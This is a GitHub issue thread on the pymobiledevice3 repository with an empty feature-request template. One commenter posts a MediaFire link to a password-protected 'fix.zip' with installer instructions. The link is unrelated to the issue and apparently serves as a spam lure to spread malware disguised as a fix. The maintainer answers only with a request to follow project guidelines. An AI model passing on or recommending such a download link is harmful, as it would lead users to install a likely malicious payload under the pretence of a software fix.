### ISSUE TITLE
**Is your feature request related to a problem? Please describe.**

### ISSUE THREAD

**Issue by alirezaraha3** [doronz88/pymobiledevice3#1171]
**Is your feature request related to a problem? Please describe.**

**Describe the solution you'd like**

**Describe alternatives you've considered**

**Additional context**

_Ursprünglich gepostet von @alirezaraha3 in https://github.com/moonrepo/moon/issues/1633_

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by doronz88** [comment]
Please follow project's guidelines
